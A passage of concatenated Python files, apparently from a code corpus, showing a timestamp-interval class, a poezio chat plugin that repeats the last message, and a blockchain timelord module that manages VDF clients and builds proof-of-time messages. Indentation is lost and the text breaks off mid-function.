INCLUDE_MILLIS = False
# ----------------------------------------------------------------------------------------------------------------
@classmethod
def construct_from_jstr(cls, jstr):
if not jstr:
return None
# document...
document = PathDict.construct_from_jstr(jstr)
if not document:
return None
# upload...
upload_node = document.node(cls.UPLOAD_FIELD)
upload = LocalizedDatetime.construct_from_iso8601(upload_node)
if upload is None:
raise ValueError(upload_node)
# rec...
rec_node = document.node(cls.REC_FIELD)
rec = LocalizedDatetime.construct_from_iso8601(rec_node)
if rec is None:
raise ValueError(rec_node)
# offset...
td = upload - rec
offset = Timedelta(days=td.days, seconds=td.seconds)
return UploadInterval(upload, rec, offset)
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, upload, rec, offset):
"""
Constructor
"""
self.__upload = upload # LocalizedDatetime
self.__rec = rec # LocalizedDatetime
self.__offset = offset # Timedelta
# ----------------------------------------------------------------------------------------------------------------
def as_json(self):
jdict = OrderedDict()
jdict['upload'] = self.upload.as_iso8601(self.INCLUDE_MILLIS)
jdict['rec'] = self.rec.as_iso8601(self.INCLUDE_MILLIS)
jdict['offset'] = self.offset
return jdict
# ----------------------------------------------------------------------------------------------------------------
@property
def upload(self):
return self.__upload
@property
def rec(self):
return self.__rec
@property
def offset(self):
return self.__offset
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "UploadInterval:{upload:%s, rec:%s, offset:%s}" % (self.upload, self.rec, self.offset)
|
py | b410422f0f864b4819ea4e06d6bd13c0598200e9 | """
Repeats the last message in the conversation.
Command
-------
.. glossary::
/mirror
**Usage:** ``/mirror``
"""
from poezio.plugin import BasePlugin
from poezio import tabs
class Plugin(BasePlugin):
def init(self):
for tab_type in (tabs.MucTab, tabs.PrivateTab, tabs.ConversationTab):
self.api.add_tab_command(tab_type, 'mirror',
handler=self.mirror,
help='Repeat the last message from the conversation.',
short='Repeat the last message from the conversation.')
def mirror(self, args):
messages = self.api.get_conversation_messages()
if not messages:
# Do nothing if the conversation doesn’t contain any message
return
last_message = messages[-1]
self.api.send_message(last_message.txt)
|
py | b410429dc2cf1c0e6932c41df5ccdc56862cf5f0 | import asyncio
import dataclasses
import io
import logging
import random
import time
import traceback
from typing import Callable, Dict, List, Optional, Tuple, Set
from chiavdf import create_discriminant
from thyme.consensus.constants import ConsensusConstants
from thyme.consensus.pot_iterations import calculate_sp_iters, is_overflow_block
from thyme.protocols import timelord_protocol
from thyme.protocols.protocol_message_types import ProtocolMessageTypes
from thyme.server.outbound_message import NodeType, make_msg
from thyme.server.server import ThymeServer
from thyme.timelord.iters_from_block import iters_from_block
from thyme.timelord.timelord_state import LastState
from thyme.timelord.types import Chain, IterationType, StateType
from thyme.types.blockchain_format.classgroup import ClassgroupElement
from thyme.types.blockchain_format.reward_chain_block import RewardChainBlock
from thyme.types.blockchain_format.sized_bytes import bytes32
from thyme.types.blockchain_format.slots import (
ChallengeChainSubSlot,
InfusedChallengeChainSubSlot,
RewardChainSubSlot,
SubSlotProofs,
)
from thyme.types.blockchain_format.sub_epoch_summary import SubEpochSummary
from thyme.types.blockchain_format.vdf import VDFInfo, VDFProof
from thyme.types.end_of_slot_bundle import EndOfSubSlotBundle
from thyme.util.ints import uint8, uint32, uint64, uint128
log = logging.getLogger(__name__)
class Timelord:
def __init__(self, root_path, config: Dict, constants: ConsensusConstants):
self.config = config
self.root_path = root_path
self.constants = constants
self._shut_down = False
self.free_clients: List[Tuple[str, asyncio.StreamReader, asyncio.StreamWriter]] = []
self.potential_free_clients: List = []
self.ip_whitelist = self.config["vdf_clients"]["ip"]
self.server: Optional[ThymeServer] = None
self.chain_type_to_stream: Dict[Chain, Tuple[str, asyncio.StreamReader, asyncio.StreamWriter]] = {}
self.chain_start_time: Dict = {}
# Chains that currently don't have a vdf_client.
self.unspawned_chains: List[Chain] = [
Chain.CHALLENGE_CHAIN,
Chain.REWARD_CHAIN,
Chain.INFUSED_CHALLENGE_CHAIN,
]
# Chains that currently accept iterations.
self.allows_iters: List[Chain] = []
# Last peak received, None if it's already processed.
self.new_peak: Optional[timelord_protocol.NewPeakTimelord] = None
# Last end of subslot bundle, None if we built a peak on top of it.
self.new_subslot_end: Optional[EndOfSubSlotBundle] = None
# Last state received. Can either be a new peak or a new EndOfSubslotBundle.
# Unfinished block info, iters adjusted to the last peak.
self.unfinished_blocks: List[timelord_protocol.NewUnfinishedBlockTimelord] = []
# Signage points iters, adjusted to the last peak.
self.signage_point_iters: List[Tuple[uint64, uint8]] = []
# For each chain, send those info when the process spawns.
self.iters_to_submit: Dict[Chain, List[uint64]] = {}
self.iters_submitted: Dict[Chain, List[uint64]] = {}
self.iters_finished: Set = set()
# For each iteration submitted, know if it's a signage point, an infusion point or an end of slot.
self.iteration_to_proof_type: Dict[uint64, IterationType] = {}
# List of proofs finished.
self.proofs_finished: List[Tuple[Chain, VDFInfo, VDFProof, int]] = []
# Data to send at vdf_client initialization.
self.overflow_blocks: List[timelord_protocol.NewUnfinishedBlockTimelord] = []
# Incremented each time `reset_chains` has been called.
# Used to label proofs in `finished_proofs` and to only filter proofs corresponding to the most recent state.
self.num_resets: int = 0
self.process_communication_tasks: List[asyncio.Task] = []
self.main_loop = None
self.vdf_server = None
self._shut_down = False
self.vdf_failures: List[Tuple[Chain, Optional[int]]] = []
self.vdf_failures_count: int = 0
self.vdf_failure_time: float = 0
self.total_unfinished: int = 0
self.total_infused: int = 0
self.state_changed_callback: Optional[Callable] = None
self.sanitizer_mode = self.config["sanitizer_mode"]
self.pending_bluebox_info: List[timelord_protocol.RequestCompactProofOfTime] = []
self.last_active_time = time.time()
async def _start(self):
self.lock: asyncio.Lock = asyncio.Lock()
self.vdf_server = await asyncio.start_server(
self._handle_client,
self.config["vdf_server"]["host"],
self.config["vdf_server"]["port"],
)
self.last_state: LastState = LastState(self.constants)
if not self.sanitizer_mode:
self.main_loop = asyncio.create_task(self._manage_chains())
else:
self.main_loop = asyncio.create_task(self._manage_discriminant_queue_sanitizer())
log.info("Started timelord.")
def _close(self):
self._shut_down = True
for task in self.process_communication_tasks:
task.cancel()
if self.main_loop is not None:
self.main_loop.cancel()
async def _await_closed(self):
pass
def set_server(self, server: ThymeServer):
self.server = server
async def _handle_client(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter):
async with self.lock:
client_ip = writer.get_extra_info("peername")[0]
log.debug(f"New timelord connection from client: {client_ip}.")
if client_ip in self.ip_whitelist:
self.free_clients.append((client_ip, reader, writer))
log.debug(f"Added new VDF client {client_ip}.")
for ip, end_time in list(self.potential_free_clients):
if ip == client_ip:
self.potential_free_clients.remove((ip, end_time))
break
async def _stop_chain(self, chain: Chain):
try:
while chain not in self.allows_iters:
self.lock.release()
await asyncio.sleep(0.05)
log.error(f"Trying to stop {chain} before its initialization.")
await self.lock.acquire()
if chain not in self.chain_type_to_stream:
log.warning(f"Trying to stop a crashed chain: {chain}.")
return None
stop_ip, _, stop_writer = self.chain_type_to_stream[chain]
self.potential_free_clients.append((stop_ip, time.time()))
stop_writer.write(b"010")
await stop_writer.drain()
if chain in self.allows_iters:
self.allows_iters.remove(chain)
if chain not in self.unspawned_chains:
self.unspawned_chains.append(chain)
if chain in self.chain_type_to_stream:
del self.chain_type_to_stream[chain]
except ConnectionResetError as e:
log.error(f"{e}")
def _can_infuse_unfinished_block(self, block: timelord_protocol.NewUnfinishedBlockTimelord) -> Optional[uint64]:
assert self.last_state is not None
sub_slot_iters = self.last_state.get_sub_slot_iters()
difficulty = self.last_state.get_difficulty()
ip_iters = self.last_state.get_last_ip()
rc_block = block.reward_chain_block
try:
block_sp_iters, block_ip_iters = iters_from_block(
self.constants,
rc_block,
sub_slot_iters,
difficulty,
)
except Exception as e:
log.warning(f"Received invalid unfinished block: {e}.")
return None
block_sp_total_iters = self.last_state.total_iters - ip_iters + block_sp_iters
if is_overflow_block(self.constants, block.reward_chain_block.signage_point_index):
block_sp_total_iters -= self.last_state.get_sub_slot_iters()
found_index = -1
for index, (rc, total_iters) in enumerate(self.last_state.reward_challenge_cache):
if rc == block.rc_prev:
found_index = index
break
if found_index == -1:
log.warning(f"Will not infuse {block.rc_prev} because its reward chain challenge is not in the chain")
return None
new_block_iters = uint64(block_ip_iters - ip_iters)
if len(self.last_state.reward_challenge_cache) > found_index + 1:
if self.last_state.reward_challenge_cache[found_index + 1][1] < block_sp_total_iters:
log.warning(
f"Will not infuse unfinished block {block.rc_prev} sp total iters {block_sp_total_iters}, "
f"because there is another infusion before its SP"
)
return None
if self.last_state.reward_challenge_cache[found_index][1] > block_sp_total_iters:
if not is_overflow_block(self.constants, block.reward_chain_block.signage_point_index):
log.error(
f"Will not infuse unfinished block {block.rc_prev}, sp total iters: {block_sp_total_iters}, "
f"because its iters are too low"
)
return None
if new_block_iters > 0:
return new_block_iters
return None
async def _reset_chains(self, first_run=False, only_eos=False):
# First, stop all chains.
self.last_active_time = time.time()
log.debug("Resetting chains")
ip_iters = self.last_state.get_last_ip()
sub_slot_iters = self.last_state.get_sub_slot_iters()
if not first_run:
for chain in list(self.chain_type_to_stream.keys()):
await self._stop_chain(chain)
# Adjust all signage points iterations to the peak.
iters_per_signage = uint64(sub_slot_iters // self.constants.NUM_SPS_SUB_SLOT)
self.signage_point_iters = [
(k * iters_per_signage - ip_iters, k)
for k in range(1, self.constants.NUM_SPS_SUB_SLOT)
if k * iters_per_signage - ip_iters > 0
]
for sp, k in self.signage_point_iters:
assert k * iters_per_signage > 0
assert k * iters_per_signage < sub_slot_iters
# Adjust all unfinished blocks iterations to the peak.
new_unfinished_blocks = []
self.iters_finished = set()
self.proofs_finished = []
self.num_resets += 1
for chain in [Chain.CHALLENGE_CHAIN, Chain.REWARD_CHAIN, Chain.INFUSED_CHALLENGE_CHAIN]:
self.iters_to_submit[chain] = []
self.iters_submitted[chain] = []
self.iteration_to_proof_type = {}
if not only_eos:
for block in self.unfinished_blocks + self.overflow_blocks:
new_block_iters: Optional[uint64] = self._can_infuse_unfinished_block(block)
# Does not add duplicates, or blocks that we cannot infuse
if new_block_iters and new_block_iters not in self.iters_to_submit[Chain.CHALLENGE_CHAIN]:
if block not in self.unfinished_blocks:
self.total_unfinished += 1
new_unfinished_blocks.append(block)
for chain in [Chain.REWARD_CHAIN, Chain.CHALLENGE_CHAIN]:
self.iters_to_submit[chain].append(new_block_iters)
if self.last_state.get_deficit() < self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
self.iters_to_submit[Chain.INFUSED_CHALLENGE_CHAIN].append(new_block_iters)
self.iteration_to_proof_type[new_block_iters] = IterationType.INFUSION_POINT
# Remove all unfinished blocks that have already passed.
self.unfinished_blocks = new_unfinished_blocks
# Signage points.
if not only_eos and len(self.signage_point_iters) > 0:
count_signage = 0
for signage, k in self.signage_point_iters:
for chain in [Chain.CHALLENGE_CHAIN, Chain.REWARD_CHAIN]:
self.iters_to_submit[chain].append(signage)
self.iteration_to_proof_type[signage] = IterationType.SIGNAGE_POINT
count_signage += 1
if count_signage == 3:
break
left_subslot_iters = sub_slot_iters - ip_iters
assert left_subslot_iters > 0
if self.last_state.get_deficit() < self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
self.iters_to_submit[Chain.INFUSED_CHALLENGE_CHAIN].append(left_subslot_iters)
self.iters_to_submit[Chain.CHALLENGE_CHAIN].append(left_subslot_iters)
self.iters_to_submit[Chain.REWARD_CHAIN].append(left_subslot_iters)
self.iteration_to_proof_type[left_subslot_iters] = IterationType.END_OF_SUBSLOT
for chain, iters in self.iters_to_submit.items():
for iteration in iters:
assert iteration > 0
async def _handle_new_peak(self):
assert self.new_peak is not None
self.last_state.set_state(self.new_peak)
if self.total_unfinished > 0:
remove_unfinished = []
for unf_block_timelord in self.unfinished_blocks + self.overflow_blocks:
if (
unf_block_timelord.reward_chain_block.get_hash()
== self.new_peak.reward_chain_block.get_unfinished().get_hash()
):
if unf_block_timelord not in self.unfinished_blocks:
# We never got the EOS for this, but we have the block in overflow list
self.total_unfinished += 1
remove_unfinished.append(unf_block_timelord)
if len(remove_unfinished) > 0:
self.total_infused += 1
for block in remove_unfinished:
if block in self.unfinished_blocks:
self.unfinished_blocks.remove(block)
if block in self.overflow_blocks:
self.overflow_blocks.remove(block)
infusion_rate = round(self.total_infused / self.total_unfinished * 100.0, 2)
log.info(
f"Total unfinished blocks: {self.total_unfinished}. "
f"Total infused blocks: {self.total_infused}. "
f"Infusion rate: {infusion_rate}%."
)
self.new_peak = None
await self._reset_chains()
async def _handle_subslot_end(self):
self.last_state.set_state(self.new_subslot_end)
for block in self.unfinished_blocks:
if self._can_infuse_unfinished_block(block) is not None:
self.total_unfinished += 1
self.new_subslot_end = None
await self._reset_chains()
async def _map_chains_with_vdf_clients(self):
while not self._shut_down:
picked_chain = None
async with self.lock:
if len(self.free_clients) == 0:
break
ip, reader, writer = self.free_clients[0]
for chain_type in self.unspawned_chains:
challenge = self.last_state.get_challenge(chain_type)
initial_form = self.last_state.get_initial_form(chain_type)
if challenge is not None and initial_form is not None:
picked_chain = chain_type
break
if picked_chain is None:
break
picked_chain = self.unspawned_chains[0]
self.chain_type_to_stream[picked_chain] = (ip, reader, writer)
self.free_clients = self.free_clients[1:]
self.unspawned_chains = self.unspawned_chains[1:]
self.chain_start_time[picked_chain] = time.time()
log.debug(f"Mapping free vdf_client with chain: {picked_chain}.")
self.process_communication_tasks.append(
asyncio.create_task(
self._do_process_communication(
picked_chain, challenge, initial_form, ip, reader, writer, proof_label=self.num_resets
)
)
)
async def _submit_iterations(self):
for chain in [Chain.CHALLENGE_CHAIN, Chain.REWARD_CHAIN, Chain.INFUSED_CHALLENGE_CHAIN]:
if chain in self.allows_iters:
_, _, writer = self.chain_type_to_stream[chain]
for iteration in self.iters_to_submit[chain]:
if iteration in self.iters_submitted[chain]:
continue
log.debug(f"Submitting iterations to {chain}: {iteration}")
assert iteration > 0
prefix = str(len(str(iteration)))
if len(str(iteration)) < 10:
prefix = "0" + prefix
iter_str = prefix + str(iteration)
writer.write(iter_str.encode())
await writer.drain()
self.iters_submitted[chain].append(iteration)
def _clear_proof_list(self, iters: uint64):
return [
(chain, info, proof, label)
for chain, info, proof, label in self.proofs_finished
if info.number_of_iterations != iters
]
async def _check_for_new_sp(self, iter_to_look_for: uint64):
signage_iters = [
iteration for iteration, t in self.iteration_to_proof_type.items() if t == IterationType.SIGNAGE_POINT
]
if len(signage_iters) == 0:
return None
to_remove = []
for potential_sp_iters, signage_point_index in self.signage_point_iters:
if potential_sp_iters not in signage_iters or potential_sp_iters != iter_to_look_for:
continue
signage_iter = potential_sp_iters
proofs_with_iter = [
(chain, info, proof)
for chain, info, proof, label in self.proofs_finished
if info.number_of_iterations == signage_iter and label == self.num_resets
]
# Wait for both cc and rc to have the signage point.
if len(proofs_with_iter) == 2:
cc_info: Optional[VDFInfo] = None
cc_proof: Optional[VDFProof] = None
rc_info: Optional[VDFInfo] = None
rc_proof: Optional[VDFProof] = None
for chain, info, proof in proofs_with_iter:
if chain == Chain.CHALLENGE_CHAIN:
cc_info = info
cc_proof = proof
if chain == Chain.REWARD_CHAIN:
rc_info = info
rc_proof = proof
if cc_info is None or cc_proof is None or rc_info is None or rc_proof is None:
log.error(f"Insufficient signage point data {signage_iter}")
continue
self.iters_finished.add(iter_to_look_for)
self.last_active_time = time.time()
rc_challenge = self.last_state.get_challenge(Chain.REWARD_CHAIN)
if rc_info.challenge != rc_challenge:
assert rc_challenge is not None
log.warning(f"SP: Do not have correct challenge {rc_challenge.hex()}" f" has {rc_info.challenge}")
# This proof is on an outdated challenge, so don't use it
continue
iters_from_sub_slot_start = cc_info.number_of_iterations + self.last_state.get_last_ip()
response = timelord_protocol.NewSignagePointVDF(
signage_point_index,
dataclasses.replace(cc_info, number_of_iterations=iters_from_sub_slot_start),
cc_proof,
rc_info,
rc_proof,
)
if self.server is not None:
msg = make_msg(ProtocolMessageTypes.new_signage_point_vdf, response)
await self.server.send_to_all([msg], NodeType.FULL_NODE)
# Cleanup the signage point from memory.
to_remove.append((signage_iter, signage_point_index))
self.proofs_finished = self._clear_proof_list(signage_iter)
# Send the next 3 signage point to the chains.
next_iters_count = 0
for next_sp, k in self.signage_point_iters:
for chain in [Chain.CHALLENGE_CHAIN, Chain.REWARD_CHAIN]:
if next_sp not in self.iters_submitted[chain] and next_sp not in self.iters_to_submit[chain]:
self.iters_to_submit[chain].append(next_sp)
self.iteration_to_proof_type[next_sp] = IterationType.SIGNAGE_POINT
next_iters_count += 1
if next_iters_count == 3:
break
# Break so we alternate between checking SP and IP
break
for r in to_remove:
self.signage_point_iters.remove(r)
async def _check_for_new_ip(self, iter_to_look_for: uint64):
if len(self.unfinished_blocks) == 0:
return None
infusion_iters = [
iteration for iteration, t in self.iteration_to_proof_type.items() if t == IterationType.INFUSION_POINT
]
for iteration in infusion_iters:
if iteration != iter_to_look_for:
continue
proofs_with_iter = [
(chain, info, proof)
for chain, info, proof, label in self.proofs_finished
if info.number_of_iterations == iteration and label == self.num_resets
]
if self.last_state.get_challenge(Chain.INFUSED_CHALLENGE_CHAIN) is not None:
chain_count = 3
else:
chain_count = 2
if len(proofs_with_iter) == chain_count:
block = None
ip_iters = None
for unfinished_block in self.unfinished_blocks:
try:
_, ip_iters = iters_from_block(
self.constants,
unfinished_block.reward_chain_block,
self.last_state.get_sub_slot_iters(),
self.last_state.get_difficulty(),
)
except Exception as e:
log.error(f"Error {e}")
continue
if ip_iters - self.last_state.get_last_ip() == iteration:
block = unfinished_block
break
assert ip_iters is not None
if block is not None:
ip_total_iters = self.last_state.get_total_iters() + iteration
challenge = block.reward_chain_block.get_hash()
icc_info: Optional[VDFInfo] = None
icc_proof: Optional[VDFProof] = None
cc_info: Optional[VDFInfo] = None
cc_proof: Optional[VDFProof] = None
rc_info: Optional[VDFInfo] = None
rc_proof: Optional[VDFProof] = None
for chain, info, proof in proofs_with_iter:
if chain == Chain.CHALLENGE_CHAIN:
cc_info = info
cc_proof = proof
if chain == Chain.REWARD_CHAIN:
rc_info = info
rc_proof = proof
if chain == Chain.INFUSED_CHALLENGE_CHAIN:
icc_info = info
icc_proof = proof
if cc_info is None or cc_proof is None or rc_info is None or rc_proof is None:
log.error(f"Insufficient VDF proofs for infusion point ch: {challenge} iterations:{iteration}")
return None
rc_challenge = self.last_state.get_challenge(Chain.REWARD_CHAIN)
if rc_info.challenge != rc_challenge:
assert rc_challenge is not None
log.warning(
f"Do not have correct challenge {rc_challenge.hex()} "
f"has {rc_info.challenge}, partial hash {block.reward_chain_block.get_hash()}"
)
# This proof is on an outdated challenge, so don't use it
continue
self.iters_finished.add(iter_to_look_for)
self.last_active_time = time.time()
log.debug(f"Generated infusion point for challenge: {challenge} iterations: {iteration}.")
overflow = is_overflow_block(self.constants, block.reward_chain_block.signage_point_index)
if not self.last_state.can_infuse_block(overflow):
log.warning("Too many blocks, or overflow in new epoch, cannot infuse, discarding")
return None
cc_info = dataclasses.replace(cc_info, number_of_iterations=ip_iters)
response = timelord_protocol.NewInfusionPointVDF(
challenge,
cc_info,
cc_proof,
rc_info,
rc_proof,
icc_info,
icc_proof,
)
msg = make_msg(ProtocolMessageTypes.new_infusion_point_vdf, response)
if self.server is not None:
await self.server.send_to_all([msg], NodeType.FULL_NODE)
self.proofs_finished = self._clear_proof_list(iteration)
if (
self.last_state.get_last_block_total_iters() is None
and not self.last_state.state_type == StateType.FIRST_SUB_SLOT
):
# We don't know when the last block was, so we can't make peaks
return None
sp_total_iters = (
ip_total_iters
- ip_iters
+ calculate_sp_iters(
self.constants,
block.sub_slot_iters,
block.reward_chain_block.signage_point_index,
)
- (block.sub_slot_iters if overflow else 0)
)
if self.last_state.state_type == StateType.FIRST_SUB_SLOT:
is_transaction_block = True
height: uint32 = uint32(0)
else:
last_block_ti = self.last_state.get_last_block_total_iters()
assert last_block_ti is not None
is_transaction_block = last_block_ti < sp_total_iters
height = uint32(self.last_state.get_height() + 1)
if height < 5:
# Don't directly update our state for the first few blocks, because we cannot validate
# whether the pre-farm is correct
return None
new_reward_chain_block = RewardChainBlock(
uint128(self.last_state.get_weight() + block.difficulty),
height,
uint128(ip_total_iters),
block.reward_chain_block.signage_point_index,
block.reward_chain_block.pos_ss_cc_challenge_hash,
block.reward_chain_block.proof_of_space,
block.reward_chain_block.challenge_chain_sp_vdf,
block.reward_chain_block.challenge_chain_sp_signature,
cc_info,
block.reward_chain_block.reward_chain_sp_vdf,
block.reward_chain_block.reward_chain_sp_signature,
rc_info,
icc_info,
is_transaction_block,
)
if self.last_state.state_type == StateType.FIRST_SUB_SLOT:
# Genesis
new_deficit = self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK - 1
elif overflow and self.last_state.deficit == self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
if self.last_state.peak is not None:
assert self.last_state.subslot_end is None
# This means the previous block is also an overflow block, and did not manage
# to lower the deficit, therefore we cannot lower it either. (new slot)
new_deficit = self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK
else:
# This means we are the first infusion in this sub-slot. This may be a new slot or not.
assert self.last_state.subslot_end is not None
if self.last_state.subslot_end.infused_challenge_chain is None:
# There is no ICC, which means we are not finishing a slot. We can reduce the deficit.
new_deficit = self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK - 1
else:
# There is an ICC, which means we are finishing a slot. Different slot, so can't change
# the deficit
new_deficit = self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK
else:
new_deficit = max(self.last_state.deficit - 1, 0)
if new_deficit == self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK - 1:
last_csb_or_eos = ip_total_iters
else:
last_csb_or_eos = self.last_state.last_challenge_sb_or_eos_total_iters
if self.last_state.just_infused_sub_epoch_summary():
new_sub_epoch_summary = None
passed_ses_height_but_not_yet_included = False
else:
new_sub_epoch_summary = block.sub_epoch_summary
if new_reward_chain_block.height % self.constants.SUB_EPOCH_BLOCKS == 0:
passed_ses_height_but_not_yet_included = True
else:
passed_ses_height_but_not_yet_included = (
self.last_state.get_passed_ses_height_but_not_yet_included()
)
self.new_peak = timelord_protocol.NewPeakTimelord(
new_reward_chain_block,
block.difficulty,
uint8(new_deficit),
block.sub_slot_iters,
new_sub_epoch_summary,
self.last_state.reward_challenge_cache,
uint128(last_csb_or_eos),
passed_ses_height_but_not_yet_included,
)
await self._handle_new_peak()
# Break so we alternate between checking SP and IP
break
async def _check_for_end_of_subslot(self, iter_to_look_for: uint64):
left_subslot_iters = [
iteration for iteration, t in self.iteration_to_proof_type.items() if t == IterationType.END_OF_SUBSLOT
]
if len(left_subslot_iters) == 0:
return None
if left_subslot_iters[0] != iter_to_look_for:
return None
chains_finished = [
(chain, info, proof)
for chain, info, proof, label in self.proofs_finished
if info.number_of_iterations == left_subslot_iters[0] and label == self.num_resets
]
if self.last_state.get_challenge(Chain.INFUSED_CHALLENGE_CHAIN) is not None:
chain_count = 3
else:
chain_count = 2
if len(chains_finished) == chain_count:
icc_ip_vdf: Optional[VDFInfo] = None
icc_ip_proof: Optional[VDFProof] = None
cc_vdf: Optional[VDFInfo] = None
cc_proof: Optional[VDFProof] = None
rc_vdf: Optional[VDFInfo] = None
rc_proof: Optional[VDFProof] = None
for chain, info, proof in chains_finished:
if chain == Chain.CHALLENGE_CHAIN:
cc_vdf = info
cc_proof = proof
if chain == Chain.REWARD_CHAIN:
rc_vdf = info
rc_proof = proof
if chain == Chain.INFUSED_CHALLENGE_CHAIN:
icc_ip_vdf = info
icc_ip_proof = proof
assert cc_proof is not None and rc_proof is not None and cc_vdf is not None and rc_vdf is not None
rc_challenge = self.last_state.get_challenge(Chain.REWARD_CHAIN)
if rc_vdf.challenge != rc_challenge:
assert rc_challenge is not None
log.warning(f"Do not have correct challenge {rc_challenge.hex()} has" f" {rc_vdf.challenge}")
# This proof is on an outdated challenge, so don't use it
return None
log.debug("Collected end of subslot vdfs.")
self.iters_finished.add(iter_to_look_for)
self.last_active_time = time.time()
iters_from_sub_slot_start = cc_vdf.number_of_iterations + self.last_state.get_last_ip()
cc_vdf = dataclasses.replace(cc_vdf, number_of_iterations=iters_from_sub_slot_start)
if icc_ip_vdf is not None:
if self.last_state.peak is not None:
total_iters = (
self.last_state.get_total_iters()
- self.last_state.get_last_ip()
+ self.last_state.get_sub_slot_iters()
)
else:
total_iters = self.last_state.get_total_iters() + self.last_state.get_sub_slot_iters()
iters_from_cb = uint64(total_iters - self.last_state.last_challenge_sb_or_eos_total_iters)
if iters_from_cb > self.last_state.sub_slot_iters:
log.error(f"{self.last_state.peak}")
log.error(f"{self.last_state.subslot_end}")
assert False
assert iters_from_cb <= self.last_state.sub_slot_iters
icc_ip_vdf = dataclasses.replace(icc_ip_vdf, number_of_iterations=iters_from_cb)
icc_sub_slot: Optional[InfusedChallengeChainSubSlot] = (
None if icc_ip_vdf is None else InfusedChallengeChainSubSlot(icc_ip_vdf)
)
if self.last_state.get_deficit() == 0:
assert icc_sub_slot is not None
icc_sub_slot_hash = icc_sub_slot.get_hash()
else:
icc_sub_slot_hash = None
next_ses: Optional[SubEpochSummary] = self.last_state.get_next_sub_epoch_summary()
if next_ses is not None:
log.info(f"Including sub epoch summary{next_ses}")
ses_hash = next_ses.get_hash()
new_sub_slot_iters = next_ses.new_sub_slot_iters
new_difficulty = next_ses.new_difficulty
else:
ses_hash = None
new_sub_slot_iters = None
new_difficulty = None
cc_sub_slot = ChallengeChainSubSlot(cc_vdf, icc_sub_slot_hash, ses_hash, new_sub_slot_iters, new_difficulty)
eos_deficit: uint8 = (
self.last_state.get_deficit()
if self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK > self.last_state.get_deficit() > 0
else self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK
)
rc_sub_slot = RewardChainSubSlot(
rc_vdf,
cc_sub_slot.get_hash(),
icc_sub_slot.get_hash() if icc_sub_slot is not None else None,
eos_deficit,
)
eos_bundle = EndOfSubSlotBundle(
cc_sub_slot,
icc_sub_slot,
rc_sub_slot,
SubSlotProofs(cc_proof, icc_ip_proof, rc_proof),
)
if self.server is not None:
msg = make_msg(
ProtocolMessageTypes.new_end_of_sub_slot_vdf,
timelord_protocol.NewEndOfSubSlotVDF(eos_bundle),
)
await self.server.send_to_all([msg], NodeType.FULL_NODE)
log.info(
f"Built end of subslot bundle. cc hash: {eos_bundle.challenge_chain.get_hash()}. New_difficulty: "
f"{eos_bundle.challenge_chain.new_difficulty} New ssi: {eos_bundle.challenge_chain.new_sub_slot_iters}"
)
if next_ses is None or next_ses.new_difficulty is None:
self.unfinished_blocks = self.overflow_blocks.copy()
else:
# No overflow blocks in a new epoch
self.unfinished_blocks = []
self.overflow_blocks = []
self.new_subslot_end = eos_bundle
await self._handle_subslot_end()
async def _handle_failures(self):
if len(self.vdf_failures) > 0:
# This can happen if one of the VDF processes has an issue. In this case, we abort all other
# infusion points and signage points, and go straight to the end of slot, so we avoid potential
# issues with the number of iterations that failed.
failed_chain, proof_label = self.vdf_failures[0]
log.error(
f"Vdf clients failed {self.vdf_failures_count} times. Last failure: {failed_chain}, "
f"label {proof_label}, current: {self.num_resets}"
)
if proof_label == self.num_resets:
await self._reset_chains(only_eos=True)
self.vdf_failure_time = time.time()
self.vdf_failures = []
# If something goes wrong in the VDF client due to a failed thread, we might get stuck in a situation where we
# are waiting for that client to finish. Usually other peers will finish the VDFs and reset us. In the case that
# there are no other timelords, this reset should bring the timelord back to a running state.
if time.time() - self.vdf_failure_time < self.constants.SUB_SLOT_TIME_TARGET * 3:
# If we have recently had a failure, allow some more time to finish the slot (we can be up to 3x slower)
active_time_threshold = self.constants.SUB_SLOT_TIME_TARGET * 3
else:
# If there were no failures recently trigger a reset after 60 seconds of no activity.
# Signage points should be every 9 seconds
active_time_threshold = 60
if time.time() - self.last_active_time > active_time_threshold:
log.error(f"Not active for {active_time_threshold} seconds, restarting all chains")
await self._reset_chains()
async def _manage_chains(self):
async with self.lock:
await asyncio.sleep(5)
await self._reset_chains(True)
while not self._shut_down:
try:
await asyncio.sleep(0.1)
async with self.lock:
await self._handle_failures()
# We've got a new peak, process it.
if self.new_peak is not None:
await self._handle_new_peak()
# Map free vdf_clients to unspawned chains.
await self._map_chains_with_vdf_clients()
async with self.lock:
# Submit pending iterations.
await self._submit_iterations()
not_finished_iters = [
it for it in self.iters_submitted[Chain.REWARD_CHAIN] if it not in self.iters_finished
]
if len(not_finished_iters) == 0:
await asyncio.sleep(0.1)
continue
selected_iter = min(not_finished_iters)
# Check for new infusion point and broadcast it if present.
await self._check_for_new_ip(selected_iter)
# Check for new signage point and broadcast it if present.
await self._check_for_new_sp(selected_iter)
# Check for end of subslot, respawn chains and build EndOfSubslotBundle.
await self._check_for_end_of_subslot(selected_iter)
except Exception:
tb = traceback.format_exc()
log.error(f"Error while handling message: {tb}")
async def _do_process_communication(
self,
chain: Chain,
challenge: bytes32,
initial_form: ClassgroupElement,
ip: str,
reader: asyncio.StreamReader,
writer: asyncio.StreamWriter,
# Data specific only when running in bluebox mode.
bluebox_iteration: Optional[uint64] = None,
header_hash: Optional[bytes32] = None,
height: Optional[uint32] = None,
field_vdf: Optional[uint8] = None,
# Labels a proof to the current state only
proof_label: Optional[int] = None,
):
disc: int = create_discriminant(challenge, self.constants.DISCRIMINANT_SIZE_BITS)
try:
# Depending on the flags 'fast_algorithm' and 'sanitizer_mode',
# the timelord tells the vdf_client what to execute.
async with self.lock:
if self.sanitizer_mode:
writer.write(b"S")
else:
if self.config["fast_algorithm"]:
# Run n-wesolowski (fast) algorithm.
writer.write(b"N")
else:
# Run two-wesolowski (slow) algorithm.
writer.write(b"T")
await writer.drain()
prefix = str(len(str(disc)))
if len(prefix) == 1:
prefix = "00" + prefix
if len(prefix) == 2:
